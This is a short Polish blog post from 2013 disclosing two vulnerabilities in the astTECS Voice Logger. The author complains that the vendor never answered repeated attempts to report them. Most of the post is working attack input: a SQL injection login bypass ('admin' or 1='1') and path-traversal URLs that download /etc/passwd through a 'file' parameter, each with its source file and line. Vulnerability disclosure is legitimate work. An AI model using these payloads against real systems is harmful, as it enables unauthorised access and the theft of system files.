wtorek, 16 lipca 2013

Hack VoIP #6 - Voice Logger astTECS

Voice Logger astTECS - bypass login & arbitrary file download

Dzisiaj, o błędach w Voice Logger firmy astTECS i o moim doświadczeniu w zgłoszeniu / w próbie zgłoszenia tej podatności. Usiłowałem i nie dałem rady. Próbowałem przez LiveChat na stronie firmy, próbowałem pisać maile do techniki. Nic, zero odzewu i zero zainteresowania ( no może oprócz Pani z LiveChata, która to skierowała mnie do techniki), a czekałem chyba z miesiąc z publikacją.

Pierwsza z opisywanych podatności to SQLi podczas logowania, taki sobie bypass login:

login: admin' or 1='1
password: admin
plik: manager_login.server.php
lina: 168


Drugi z błędów pozwala na pobranie dowolnego pliku z serwera (trzeba pamiętać o uprawnieniach httpd) 

http://192.168.1.145/asttecs/records1.php?file=/etc/passwd
plik:records.php
linia: 2

http://192.168.1.145/asttecs/records.php?file=/etc/passwd
plik:records.php
linia: 2